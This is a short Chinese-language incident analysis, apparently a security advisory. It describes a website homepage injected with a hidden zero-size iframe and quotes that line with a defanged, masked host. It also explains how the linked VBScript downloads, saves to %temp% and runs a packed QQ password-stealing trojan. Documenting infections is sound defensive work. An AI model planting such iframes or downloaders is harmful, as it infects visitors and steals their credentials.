该网站首页末被加入代码:
/-------- <iframe src=hxxp://www.race***swd.com.**/w***m*.htm width=0 height=0 frameborder=0></iframe> --------/
hxxp://www.race***swd.com.**/w***m*.htm 的内容为escape()编码的VBSctipt代码,其功能为利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://www.race***swd.com.**/**1**.exe,保存为 %temp%/asde.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
**1**.exe 采用 tElock 0.80 -> tE! 加壳,文件长度为28,109 字节,Kaspersky 报为 Trojan-PSW.Win32.QQPass.mz,瑞星 报为 Trojan.PSW.QQPass.qbe。